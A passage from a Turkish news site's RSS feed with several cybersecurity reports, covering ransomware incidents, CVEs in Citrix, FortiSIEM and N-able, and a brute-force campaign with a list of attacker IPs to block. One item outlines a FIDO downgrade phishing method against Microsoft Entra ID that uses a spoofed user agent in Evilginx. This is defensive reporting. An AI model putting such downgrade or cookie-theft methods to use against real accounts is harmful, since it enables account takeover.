            <title>Manulaş’a fidye yazılımı saldırısı: 1,2 milyon kayıtta kişisel veri riski açıklandı</title>
            <link>https://cumha.com.tr/manulasa-fidye-yazilimi-saldirisi-12-milyon-kayitta-kisisel-veri-riski-aciklandi</link>
            <guid>https://cumha.com.tr/manulasa-fidye-yazilimi-saldirisi-12-milyon-kayitta-kisisel-veri-riski-aciklandi</guid>
            <description><![CDATA[ Manisa’da toplu ulaşım hizmeti veren Manulaş’ın sistemlerine 25 Mayıs 2025’te fidye yazılımı saldırısı düzenlendi. 1 milyon 268 bin 222 kaydın etkilendiği olayda ad, T.C. kimlik numarası, iletişim ve sağlık bilgileri risk altına girdi. Kişisel Verileri Koruma Kurulu, ihlalin kamuoyuna duyurulmasına karar verdi. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a4714e56c5e.webp" length="53418" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 12:08:09 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Manulaş veri ihlalinde hangi kişisel bilgiler risk altında, saldırıdan kaç kişi etkilendi, veriler dışarıya sızdırıldı mı, vatandaşlar bilgi almak için nereye başvurabilir</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="456" data-end="770"><strong data-start="456" data-end="491">Saldırı 25 Mayıs’ta gerçekleşti</strong><br data-start="491" data-end="494">Manulaş Manisa Ulaşım Hizmetleri Makina Sanayi ve Ticaret A.Ş., kişisel verileri etkileyen siber saldırıya ilişkin Kişisel Verileri Koruma Kurumu’na (KVKK) bildirimde bulundu. Açıklamaya göre fidye yazılımı saldırısı 25 Mayıs 2025’te meydana geldi ve aynı gün tespit edildi.</p>
<p data-start="772" data-end="1014"><strong data-start="772" data-end="813">1,2 milyon kayıtta risk tespit edildi</strong><br data-start="813" data-end="816">Şirket tarafından yapılan bildirimde, 1 milyon 268 bin 222 kayıt üzerinde ihlal gerçekleştiği, sistemde çok sayıda mükerrer veri bulunduğu için gerçek kişi sayısının daha az olabileceği aktarıldı.</p>
<p data-start="1016" data-end="1363"><strong data-start="1016" data-end="1052">Kapsamlı veri grupları etkilendi</strong><br data-start="1052" data-end="1055">Saldırıdan etkilenen kişisel veriler arasında ad, soyad, T.C. kimlik numarası, doğum tarihi, cinsiyet, telefon numarası, e-posta adresi, açık adres, meslek bilgisi, plaka numarası, fotoğraf ve sağlık bilgileri (engellilik durumu ve oranı) yer aldı. Etkilenen grupların aboneler ve üyeler olduğu bildirildi.</p>
<p data-start="1365" data-end="1597"><strong data-start="1365" data-end="1390">İnceleme devam ediyor</strong><br data-start="1390" data-end="1393">Verilerin dışarıya aktarılıp aktarılmadığı henüz tespit edilemezken, Kişisel Verileri Koruma Kurulu’nun 3 Haziran 2025 tarihli ve 2025/999 sayılı kararıyla ihlalin kamuoyuna duyurulması kararlaştırıldı.</p>
<p data-start="1599" data-end="1849"><strong data-start="1599" data-end="1634">Vatandaşların başvuru kanalları</strong><br data-start="1634" data-end="1637">İhlalden etkilenen kişiler, Manulaş’ın web sitesi (<a data-start="1688" data-end="1738" rel="noopener" target="_new" class="" href="https://manulas.com.tr/">https://manulas.com.tr/</a>), 0 236 232 19 00 numaralı telefon hattı veya <a data-start="1785" data-end="1804" class="cursor-pointer" rel="noopener">info@manulas.com.tr</a> e-posta adresi üzerinden bilgi alabilecek.</p>
<p data-start="1851" data-end="2041"><strong data-start="1851" data-end="1863"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Microsoft, PowerShell 2.0’ı Windows 11 ve Windows Server’dan kalıcı olarak kaldırıyor</title>
            <link>https://cumha.com.tr/microsoft-powershell-20i-windows-11-ve-windows-serverdan-kalici-olarak-kaldiriyor</link>
            <guid>https://cumha.com.tr/microsoft-powershell-20i-windows-11-ve-windows-serverdan-kalici-olarak-kaldiriyor</guid>
            <description><![CDATA[ Windows 7 ile tanıtılan ve 14 yıldır kullanılan PowerShell 2.0, Ağustos 2025’ten itibaren Windows 11 sürüm 24H2’den, Eylül 2025’te ise Windows Server 2025’ten tamamen kaldırılacak. Microsoft, güvenlik ve sistem sadeleştirmesi için aldığı bu kararın eski yazılımlara bağımlı kullanıcıları etkileyeceğini belirtti. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a471848f817.webp" length="33110" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 11:44:39 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>PowerShell 2.0 ne zaman kaldırılacak, hangi kullanıcılar doğrudan etkilenecek, eski betikler hangi sürüme yönlendirilecek, Microsoft hangi güncelleme ve geçiş adımlarını öneriyor</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="454" data-end="457">Microsoft, sekiz yıl önce kullanım dışı ilan ettiği PowerShell 2.0’ı Windows işletim sistemlerinden tamamen kaldırma sürecini başlattı. Şirketin duyurusuna göre kaldırma işlemi Windows 11 için Ağustos 2025’te, Windows Server için ise Eylül 2025’te başlayacak.</p>
<p></p>
<p data-start="720" data-end="982">PowerShell 2.0, 2009’da Windows 7 ile birlikte tanıtılmış ve uzun süre sistem yönetiminde yaygın olarak kullanılmıştı. Ancak güvenlik zafiyetleri, modern özelliklerin eksikliği ve bakım yükü nedeniyle yıllardır sadece “isteğe bağlı özellik” olarak tutuluyordu.</p>
<p data-start="984" data-end="1292"><strong data-start="984" data-end="1010">Etkilenen Kullanıcılar</strong><br data-start="1010" data-end="1013">Microsoft, modern sürümler olan PowerShell 5.1 ve PowerShell 7’nin desteğinin devam ettiğini, dolayısıyla çoğu kullanıcı için bir sorun yaşanmayacağını açıkladı. Ancak PowerShell 2.0’a bağımlı eski uygulamalar ve betikler kullanan müşterilerin doğrudan etkileneceği bildirildi.</p>
<p data-start="1294" data-end="1522">Şirket, eski Microsoft ürünleri (Exchange, SharePoint, SQL Server gibi) ve bazı üçüncü taraf yazılımların hâlâ PowerShell 2.0’a ihtiyaç duyabileceğini, bu nedenle kullanıcıların sistemlerini uyarlamaları gerektiğini vurguladı.</p>
<p data-start="1524" data-end="1825"><strong data-start="1524" data-end="1557">Geriye Dönük Uyum ve Öneriler</strong><br data-start="1557" data-end="1560">PowerShell 2.0 çalıştırmaya çalışan betikler varsayılan olarak PowerShell 5.1’e yönlendirilecek. Çoğu komut ve modül geriye dönük uyumlulukla çalışsa da Microsoft, kullanıcıların eski betiklerini güncellemeleri ve PowerShell 7’ye geçiş yapmalarını tavsiye ediyor.</p>
<p data-start="1827" data-end="2106">Microsoft’un açıklamasında, “Desteklenen ve güncel PowerShell sürümlerini kullanarak betiklerinizin daha güvenli çalışmasını sağlayabilirsiniz. PowerShell 2.0’a bağımlı yazılım ve betiklerinizi güncellemeniz veya geçici çözümlerle uyarlamanız gerekmektedir” ifadeleri yer aldı.</p>
<p data-start="2108" data-end="2305"><strong data-start="2108" data-end="2120"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Pennsylvania Başsavcılık ofisi siber saldırı sonrası e-posta, sabit hat ve web sitesinin devre dışı kaldığını açıkladı</title>
            <link>https://cumha.com.tr/pennsylvania-bassavcilik-ofisi-siber-saldiri-sonrasi-e-posta-sabit-hat-ve-web-sitesinin-devre-disi-kaldigini-acikladi</link>
            <guid>https://cumha.com.tr/pennsylvania-bassavcilik-ofisi-siber-saldiri-sonrasi-e-posta-sabit-hat-ve-web-sitesinin-devre-disi-kaldigini-acikladi</guid>
            <description><![CDATA[ Pennsylvania Başsavcılık Ofisi, hafta sonu gerçekleşen siber saldırının ardından kurum ağının devre dışı kaldığını, kurumsal web sitesi, e-posta hesapları ve sabit hatların çalışmadığını bildirdi. Başsavcı Dave Sunday, kolluk birimleriyle birlikte olayı soruşturduklarını ve hizmetleri geri yüklemek için çalıştıklarını açıkladı. Resmî atıf yapılmasa da saldırının kapsamı fidye yazılımı şüphesi doğurdu. Bir ay önce kurum altyapısında kamuya açık Citrix NetScaler cihazlarında kritik CVE-2025-5777 açığına karşı zafiyetler tespit edilmişti. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a471a3272f8.webp" length="56476" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 11:44:38 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Başsavcılık ofisinde hangi hizmetler kesintiye uğradı, saldırının fidye yazılımı olma ihtimali neden gündemde, olası giriş vektörü olarak hangi zafiyet değerlendiriliyor, kurumlar bu tür saldırılara karşı hangi acil adımları atmalı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="716" data-end="719">Pennsylvania Başsavcılık Ofisi, Cuma günü gerçekleşen siber olayın ardından ağ servislerinin devre dışı kaldığını duyurdu. Başsavcı Dave Sunday, sosyal medya üzerinden yaptığı açıklamada, “Başsavcılık Ofisi sistemlerini barındıran ağ şu anda kapalı durumda; kurum web sitesi, ofis e-posta hesapları ve sabit hatlar çevrimdışı.” dedi. Sunday, olayın nedeninin araştırıldığını ve tüm kanallarda hizmetlerin geri yüklenmesi için çalışmaların sürdüğünü belirtti.</p>
<p></p>
<p data-start="1181" data-end="1539"><strong data-start="1181" data-end="1205">Ne oldu, ne etkiledi</strong><br data-start="1205" data-end="1208">Kurum, kamuya açık bir atıf yapmadı; herhangi bir tehdit grubu işaret edilmedi. Ancak etki alanının genişliği ve hizmet kesintilerinin süresi, fidye yazılımı ihtimalini güçlendirdi. Olay sırasında ofis personelinin çalışmalarını sürdürdüğü ve kesintilerin en aza indirilmesi için yöneticilerle koordinasyon sağlandığı bildirildi.</p>
<p data-start="1541" data-end="1979"><strong data-start="1541" data-end="1564">Olası giriş vektörü</strong><br data-start="1564" data-end="1567">Saldırı vektörü resmen açıklanmadı. Bununla birlikte siber güvenlik uzmanı Kevin Beaumont, yaklaşık bir ay önce Pennsylvania Başsavcılık ağı üzerinde internetten erişilen bazı Citrix NetScaler cihazlarının kritik CVE-2025-5777 (Citrix Bleed 2) açığına karşı savunmasız olduğunu tespit etmişti. Paylaşılan Shodan bulgularına göre iki cihazdan biri 29 Temmuz’dan, diğeri 7 Ağustos’tan bu yana çevrimdışı durumda.</p>
<p data-start="1981" data-end="2415"><strong data-start="1981" data-end="2008">Genişleyen risk tablosu</strong><br data-start="2008" data-end="2011">Shadowserver Foundation, pazartesi günü 3.300’ün üzerinde NetScaler cihazının hâlâ CVE-2025-5777’ye karşı savunmasız olduğunu rapor etti. Hollanda Ulusal Siber Güvenlik Merkezi (NCSC), en az Mayıs başından beri bu açığın sıfır gün olarak kritik kuruluşlara karşı kullanıldığını bildirdi. Hollanda Savcılık Kurumu (Openbaar Ministerie) 18 Temmuz’da e-posta sunucularını etkileyen bir ihlali açıklamıştı.</p>
<p data-start="2417" data-end="2767"><strong data-start="2417" data-end="2452">Resmî uyarılar ve yükümlülükler</strong><br data-start="2452" data-end="2455">CISA, söz konusu Citrix açığını “Bilinen İstismar Edilen Zafiyetler” kataloğuna ekleyerek federal kurumlara acil yama yükümlülüğü getirdi. Kurumlar için öneriler; hızla yamalama, etkilenen cihazların internetten erişimini sınırlama ve olağandışı kimlik doğrulama aktivitelerine karşı izleme olarak sıralanıyor.</p>
<p data-start="2769" data-end="3019"><strong data-start="2769" data-end="2781"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Fortinet VPN’lerine yönelik kaba kuvvet saldırılarında artış: Yeni sıfır gün açıklarının habercisi olabilir</title>
            <link>https://cumha.com.tr/fortinet-vpnlerine-yoenelik-kaba-kuvvet-saldirilarinda-artis-yeni-sifir-gun-aciklarinin-habercisi-olabilir</link>
            <guid>https://cumha.com.tr/fortinet-vpnlerine-yoenelik-kaba-kuvvet-saldirilarinda-artis-yeni-sifir-gun-aciklarinin-habercisi-olabilir</guid>
            <description><![CDATA[ Tehdit istihbarat platformu GreyNoise, 3 ve 5 Ağustos tarihlerinde Fortinet SSL VPN’lerine ve FortiManager’a yönelik yoğun kaba kuvvet saldırıları tespit etti. Uzmanlar, bu tür saldırı dalgalarının genellikle yeni güvenlik açıklarının duyurulmasından önce ortaya çıktığını belirterek kurumları uyardı. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a471afb3be5.webp" length="50062" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 11:44:37 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Fortinet VPN’lerine yönelik kaba kuvvet saldırılarında nasıl bir artış görüldü, saldırılar hangi tarihlerde yoğunlaştı, hangi IP adresleri engellenmeli, bu saldırılar sıfır gün açıklarıyla nasıl ilişkilendiriliyor</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="465" data-end="468">Fortinet ürünlerine yönelik saldırılarda dikkat çekici bir artış gözlemlendi. GreyNoise’un raporuna göre, 3 Ağustos 2025’te Fortinet SSL VPN sistemlerine yönelik kaba kuvvet saldırılarında ani bir yükseliş yaşandı. İki gün sonra, 5 Ağustos’ta saldırılar bu kez FortiManager’ın FGFM servisine yöneldi.</p>
<p></p>
<p data-start="772" data-end="1149">Söz konusu değişim, saldırganların ya aynı altyapıyı kullanarak farklı Fortinet ürünlerini hedef aldığını ya da kullandıkları araçların yeni hedeflere adapte edildiğini gösteriyor. GreyNoise, bu tür saldırıların genellikle yeni güvenlik açıklarının açıklanmasından yaklaşık altı hafta önce tespit edildiğini ve istismar girişimlerinin kısa sürede başlayabileceğini vurguladı.</p>
<p data-start="1151" data-end="1452"><strong data-start="1151" data-end="1180">Tespit Edilen Faaliyetler</strong><br data-start="1180" data-end="1183">GreyNoise’un analizine göre, 3 Ağustos’taki saldırı trafiği daha önce Haziran ayında Pilot Fiber Inc. ile ilişkili bir FortiGate cihazından kaydedilen etkinliklerle benzerlik gösterdi. Bu durum, aynı araçların veya altyapının tekrar kullanım ihtimaline işaret ediyor.</p>
<p data-start="1454" data-end="1715">5 Ağustos’tan itibaren ise trafik SSL VPN yerine FortiManager’a yöneldi. GreyNoise, bunun sadece araştırmacıların yaptığı geniş kapsamlı taramalardan farklı olduğunu, doğrudan yetkisiz erişim denemelerine işaret eden kaba kuvvet saldırıları olduğunu belirtti.</p>
<p data-start="1717" data-end="1882"><strong data-start="1717" data-end="1754">Engellenmesi Gereken IP Adresleri</strong><br data-start="1754" data-end="1757">Rapor kapsamında aşağıdaki IP adresleri saldırılarla ilişkilendirildi ve güvenlik duvarlarında engellenmesi tavsiye edildi:</p>
<ul data-start="1884" data-end="2071">
<li data-start="1884" data-end="1901">
<p data-start="1886" data-end="1901">31.206.51.194</p>
</li>
<li data-start="1902" data-end="1920">
<p data-start="1904" data-end="1920">23.120.100.230</p>
</li>
<li data-start="1921" data-end="1937">
<p data-start="1923" data-end="1937">96.67.212.83</p>
</li>
<li data-start="1938" data-end="1957">
<p data-start="1940" data-end="1957">104.129.137.162</p>
</li>
<li data-start="1958" data-end="1975">
<p data-start="1960" data-end="1975">118.97.151.34</p>
</li>
<li data-start="1976" data-end="1994">
<p data-start="1978" data-end="1994">180.254.147.16</p>
</li>
<li data-start="1995" data-end="2013">
<p data-start="1997" data-end="2013">20.207.197.237</p>
</li>
<li data-start="2014" data-end="2033">
<p data-start="2016" data-end="2033">180.254.155.227</p>
</li>
<li data-start="2034" data-end="2052">
<p data-start="2036" data-end="2052">185.77.225.174</p>
</li>
<li data-start="2053" data-end="2071">
<p data-start="2055" data-end="2071">45.227.254.113</p>
</li>
</ul>
<p data-start="2073" data-end="2288"><strong data-start="2073" data-end="2097">Uzmanlardan Uyarılar</strong><br data-start="2097" data-end="2100">GreyNoise, yöneticilere Fortinet cihazlarında oturum açma korumalarını güçlendirmeleri, dış erişimleri yalnızca güvenilir IP aralıkları ve VPN üzerinden sınırlamaları çağrısında bulundu.</p>
<p data-start="2290" data-end="2479">Siber güvenlik uzmanları, kaba kuvvet saldırılarındaki bu artışın, Fortinet ürünlerinde henüz açıklanmamış sıfır gün açıklarının duyurulmadan önce test edilmesi ihtimaline dikkat çekiyor.</p>
<p data-start="2481" data-end="2713"><strong data-start="2481" data-end="2493"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Microsoft Entra ID’de FIDO kimlik doğrulamasını devre dışı bırakabilen yeni saldırı yöntemi keşfedildi</title>
            <link>https://cumha.com.tr/microsoft-entra-idde-fido-kimlik-dogrulamasini-devre-disi-birakabilen-yeni-saldiri-yoentemi-kesfedildi</link>
            <guid>https://cumha.com.tr/microsoft-entra-idde-fido-kimlik-dogrulamasini-devre-disi-birakabilen-yeni-saldiri-yoentemi-kesfedildi</guid>
            <description><![CDATA[ Proofpoint araştırmacıları, Microsoft Entra ID kullanıcılarını FIDO kimlik doğrulamasından daha zayıf yöntemlere yönlendiren yeni bir “downgrade” saldırısı geliştirdi. Bu yöntemle saldırganlar, AiTM (adversary-in-the-middle) tekniği üzerinden oturum çerezlerini ele geçirerek hesapları ele geçirebiliyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a471dca9abc.webp" length="55820" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 11:44:36 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>FIDO downgrade saldırısı nasıl çalışıyor, Microsoft Entra ID kullanıcıları hangi risklerle karşı karşıya, saldırıyı önlemek için hangi önlemler alınmalı, Microsoft bu araştırmaya nasıl yanıt verdi</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="463" data-end="466">Siber güvenlik araştırmacıları, Microsoft Entra ID’de kullanılan FIDO tabanlı şifresiz kimlik doğrulamanın dolaylı olarak devre dışı bırakılabileceğini gösteren yeni bir saldırı tekniği ortaya koydu. Proofpoint tarafından geliştirilen yöntem, kullanıcıların FIDO desteği olmayan bir tarayıcı kullandıkları izlenimini vererek, onları daha zayıf doğrulama yöntemlerine yönlendiriyor.</p>
<p></p>
<p data-start="851" data-end="1264"><strong data-start="851" data-end="874">Saldırının İşleyişi</strong><br data-start="874" data-end="877">Araştırmacılar, Evilginx adlı AiTM (adversary-in-the-middle) çerçevesine özel bir “phishlet” ekleyerek Safari’nin Windows sürümünü taklit eden bir kullanıcı aracısı oluşturdu. Bu tarayıcı FIDO tabanlı kimlik doğrulamasını desteklemediği için Microsoft Entra ID, kullanıcıya hata mesajı gösteriyor ve alternatif yöntemler (Microsoft Authenticator uygulaması, SMS kodu, OTP vb.) sunuyor.</p>
<p data-start="1266" data-end="1540">Kullanıcı bu yöntemlerden biriyle giriş yaptığında, saldırı platformu hem kullanıcı adı/parolayı hem de çok faktörlü doğrulama (MFA) tokenini veya oturum çerezini ele geçiriyor. Bu çerez saldırganın tarayıcısına aktarıldığında, kurbanın hesabına tam erişim sağlanabiliyor.</p>
<p data-start="1542" data-end="1748"><strong data-start="1542" data-end="1574">Henüz Saldırılarda Görülmedi</strong><br data-start="1574" data-end="1577">Proofpoint, yöntemin şu ana kadar gerçek saldırılarda kullanılmadığını ancak özellikle yüksek değerli hedeflere yönelik operasyonlarda ciddi risk oluşturduğunu belirtti.</p>
<p data-start="1750" data-end="2082">Microsoft, araştırma hakkında yaptığı açıklamada bunun bir ürün açığı olmadığını, sosyal mühendislik yoluyla gerçekleştirilen bir oltalama tekniği olduğunu vurguladı. Şirket, kullanıcıların kimlik doğrulama gücü politikalarıyla daha güçlü yöntemleri zorunlu hale getirmesini ve şüpheli bağlantılara tıklamaktan kaçınmasını önerdi.</p>
<p data-start="2084" data-end="2367"><strong data-start="2084" data-end="2096">Önlemler</strong><br data-start="2096" data-end="2099">Uzmanlar, kullanıcıların beklenmedik şekilde alternatif kimlik doğrulama seçenekleriyle karşılaşmaları halinde işlemi durdurmaları gerektiğini söylüyor. Ayrıca, fallback doğrulama yöntemlerinin kapatılması veya ek güvenlik kontrollerinin devreye alınması öneriliyor.</p>
<p data-start="2369" data-end="2624">Geçtiğimiz ay farklı bir FIDO zayıflatma saldırısı da rapor edilmişti. Expel araştırmacıları tarafından geliştirilen “PoisonSeed” adlı yöntemde kullanıcılar sahte bir QR kod aracılığıyla kandırılmaya çalışılmış, ancak pratikte saldırı başarısız olmuştu.</p>
<p data-start="2626" data-end="2841"><strong data-start="2626" data-end="2638"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Fortinet, FortiSIEM’de kritik uzaktan kod çalıştırma açığı için uyardı: İstismar kodu dolaşımda</title>
            <link>https://cumha.com.tr/fortinet-fortisiemde-kritik-uzaktan-kod-calistirma-acigi-icin-uyardi-istismar-kodu-dolasimda</link>
            <guid>https://cumha.com.tr/fortinet-fortisiemde-kritik-uzaktan-kod-calistirma-acigi-icin-uyardi-istismar-kodu-dolasimda</guid>
            <description><![CDATA[ Fortinet, güvenlik operasyon merkezlerinde yaygın olarak kullanılan FortiSIEM ürününde kimlik doğrulama gerektirmeden istismar edilebilen kritik bir güvenlik açığı (CVE-2025-25256) tespit edildiğini duyurdu. Şirket, aktif saldırıların başladığını ve yöneticilerin acilen güncellemeleri uygulaması gerektiğini bildirdi. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a472120d722.webp" length="44780" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 11:44:35 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>FortiSIEM güvenlik açığı nasıl çalışıyor, hangi sürümler risk altında, yöneticilerin uygulaması gereken güvenlik güncellemeleri neler, geçici olarak hangi önlemler alınabiliyor</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="470" data-end="473">Fortinet, FortiSIEM güvenlik izleme ve analiz sisteminde kritik seviyede bir güvenlik açığının (CVE-2025-25256) istismar edildiğini açıkladı. CVSS puanı 9.8 olan açık, saldırganların özel hazırlanmış CLI istekleri aracılığıyla uzaktan ve kimlik doğrulaması olmadan komut çalıştırmasına olanak tanıyor.</p>
<p></p>
<p data-start="778" data-end="1018">FortiSIEM; kamu kurumları, büyük ölçekli işletmeler, finans kuruluşları, sağlık sektörü ve yönetilen güvenlik hizmet sağlayıcıları (MSSP) tarafından yaygın olarak kullanılıyor. Açığın etki alanı 5.4 sürümünden 7.3 sürümüne kadar uzanıyor.</p>
<p data-start="1020" data-end="1344"><strong data-start="1020" data-end="1049">Fortinet’ten Kritik Uyarı</strong><br data-start="1049" data-end="1052">Fortinet, açığın aktif olarak kullanıldığını doğruladı. Açıklamada, “Bu güvenlik açığı için pratik istismar kodunun dolaşımda olduğu tespit edilmiştir” ifadesine yer verildi. Ayrıca istismarın cihazda ayırt edici bir gösterge (IOC) bırakmadığı, dolayısıyla tespitinin zor olduğu belirtildi.</p>
<p data-start="1346" data-end="1437">Şirket, güvenlik güncellemesi yayımlanan sürümlere acilen geçilmesi gerektiğini bildirdi:</p>
<ul data-start="1439" data-end="1539">
<li data-start="1439" data-end="1458">
<p data-start="1441" data-end="1458">FortiSIEM 7.3.2</p>
</li>
<li data-start="1459" data-end="1478">
<p data-start="1461" data-end="1478">FortiSIEM 7.2.6</p>
</li>
<li data-start="1479" data-end="1498">
<p data-start="1481" data-end="1498">FortiSIEM 7.1.8</p>
</li>
<li data-start="1499" data-end="1518">
<p data-start="1501" data-end="1518">FortiSIEM 7.0.4</p>
</li>
<li data-start="1519" data-end="1539">
<p data-start="1521" data-end="1539">FortiSIEM 6.7.10</p>
</li>
</ul>
<p data-start="1541" data-end="1689">5.4 ile 6.6 arasındaki eski sürümler için yama yayımlanmayacağı, bu sürümlerin kullanıcılarının desteklenen sürümlere geçmesi gerektiği açıklandı.</p>
<p data-start="1691" data-end="1939"><strong data-start="1691" data-end="1719">Geçici Çözüm ve Önlemler</strong><br data-start="1719" data-end="1722">Fortinet, phMonitor bileşeninin 7900 numaralı portuna erişimi kısıtlamanın geçici bir önlem olabileceğini bildirdi. Ancak bunun yalnızca saldırı yüzeyini daralttığı, açığın kendisini ortadan kaldırmadığı vurgulandı.</p>
<p data-start="1941" data-end="2274">Açıklama, GreyNoise’un bu ayın başında Fortinet SSL VPN’lerine yönelik kaba kuvvet saldırılarında büyük artış gözlemlendiğini ve daha sonra FortiManager’a yönelim olduğunu rapor etmesinin hemen ardından geldi. Güvenlik uzmanları bu tür trafik artışlarının çoğu zaman yeni bir güvenlik açığının habercisi olabileceğini ifade ediyor.</p>
<p data-start="2276" data-end="2471"><strong data-start="2276" data-end="2288"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>CISA, N-able N-central güvenlik açıklarının aktif olarak istismar edildiğini duyurdu, yöneticilere acil yama çağrısı yaptı</title>
            <link>https://cumha.com.tr/cisa-n-able-n-central-guvenlik-aciklarinin-aktif-olarak-istismar-edildigini-duyurdu-yoeneticilere-acil-yama-cagrisi-yapti</link>
            <guid>https://cumha.com.tr/cisa-n-able-n-central-guvenlik-aciklarinin-aktif-olarak-istismar-edildigini-duyurdu-yoeneticilere-acil-yama-cagrisi-yapti</guid>
            <description><![CDATA[ ABD Siber Güvenlik ve Altyapı Güvenliği Ajansı (CISA), N-able’ın N-central platformunda tespit edilen iki kritik açığın sıfır gün saldırılarında kullanıldığını açıkladı. Şirket yamaları yayımlarken, on-premises kullanıcıların 2025.3.1 sürümüne yükseltmesi istendi. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a47addea8ee.webp" length="61682" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 11:44:33 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>N-able N-central güvenlik açıkları hangi riskleri taşıyor, istismar edilen zafiyetler nasıl çalışıyor, CISA hangi kurumlara hangi süreyi tanıdı, N-able kullanıcılarının hangi sürüme geçmesi gerekiyor</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="443" data-end="446">ABD Siber Güvenlik ve Altyapı Güvenliği Ajansı (CISA), N-able’ın uzaktan izleme ve yönetim platformu N-central’da iki güvenlik açığının aktif olarak kullanıldığını duyurdu. N-central, yönetilen hizmet sağlayıcılar (MSP) ve IT departmanları tarafından ağ ve cihazları merkezi bir konsoldan yönetmek için yaygın olarak kullanılıyor.</p>
<p></p>
<p data-start="780" data-end="997">CISA’nın açıklamasına göre, CVE-2025-8875 olarak izlenen açık güvenliksiz serileştirme üzerinden komut çalıştırmaya, CVE-2025-8876 ise kullanıcı girdisinin hatalı filtrelenmesiyle komut enjeksiyonuna olanak tanıyor.</p>
<p data-start="999" data-end="1309"><strong data-start="999" data-end="1030">N-able’dan Açıklama ve Yama</strong><br data-start="1030" data-end="1033">N-able, açıkların istismar edildiğini doğrulayarak güvenlik güncellemelerinin N-central 2025.3.1 sürümüyle yayımlandığını bildirdi. Şirket, saldırıların sınırlı sayıda on-premises ortamda gözlemlendiğini, ancak bulut tabanlı sistemlerde bir bulguya rastlanmadığını açıkladı.</p>
<p data-start="1311" data-end="1549">Şirketin duyurusunda, “On-premises N-central kullananların vakit kaybetmeden 2025.3.1 sürümüne yükseltmesi gerekmektedir. Güvenlik politikamız gereği CVE ayrıntıları güncellemeden üç hafta sonra paylaşılacaktır” ifadelerine yer verildi.</p>
<p data-start="1551" data-end="1943"><strong data-start="1551" data-end="1593">Federal Kurumlara Son Tarih 20 Ağustos</strong><br data-start="1593" data-end="1596">CISA, söz konusu açıkları “Bilinen İstismar Edilen Açıklar Kataloğu”na ekleyerek Federal Civilian Executive Branch kurumlarının 20 Ağustos’a kadar sistemlerini yamalamasını zorunlu kıldı. 2021’de yürürlüğe giren Bağlayıcı Operasyonel Direktif (BOD) 22-01 çerçevesinde belirlenen süreye uymayan kurumlar ciddi risklerle karşı karşıya kalabilecek.</p>
<p data-start="1945" data-end="2113">Shodan verilerine göre, çevrimiçi olarak erişilebilir yaklaşık 2.000 N-able N-central örneği bulunuyor. Bunların büyük kısmı ABD, Avustralya ve Almanya’da yer alıyor.</p>
<p data-start="2115" data-end="2374">CISA ayrıca özel sektör dahil tüm kuruluşlara da güncellemeleri önceliklendirmeleri yönünde çağrı yaptı. Açıklamada, “Bu tür açıklar kötü niyetli aktörler için sık kullanılan saldırı vektörleri olup federal ağlar için ciddi riskler oluşturmaktadır” denildi.</p>
<p data-start="2376" data-end="2594"><strong data-start="2376" data-end="2388"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Kanada Avam Kamarası’nda siber saldırı sonrası veri ihlali soruşturması başlatıldı</title>
            <link>https://cumha.com.tr/kanada-avam-kamarasinda-siber-saldiri-sonrasi-veri-ihlali-sorusturmasi-baslatildi</link>
            <guid>https://cumha.com.tr/kanada-avam-kamarasinda-siber-saldiri-sonrasi-veri-ihlali-sorusturmasi-baslatildi</guid>
            <description><![CDATA[ Kanada Avam Kamarası çalışanlarının bilgilerinin çalındığı bir siber saldırı sonrası yetkililer soruşturma başlattı. Microsoft güvenlik açığının kullanıldığı olayda saldırganların, parlamento personeline ait isim, görev, ofis ve e-posta verilerini ele geçirdiği bildirildi. ]]></description>

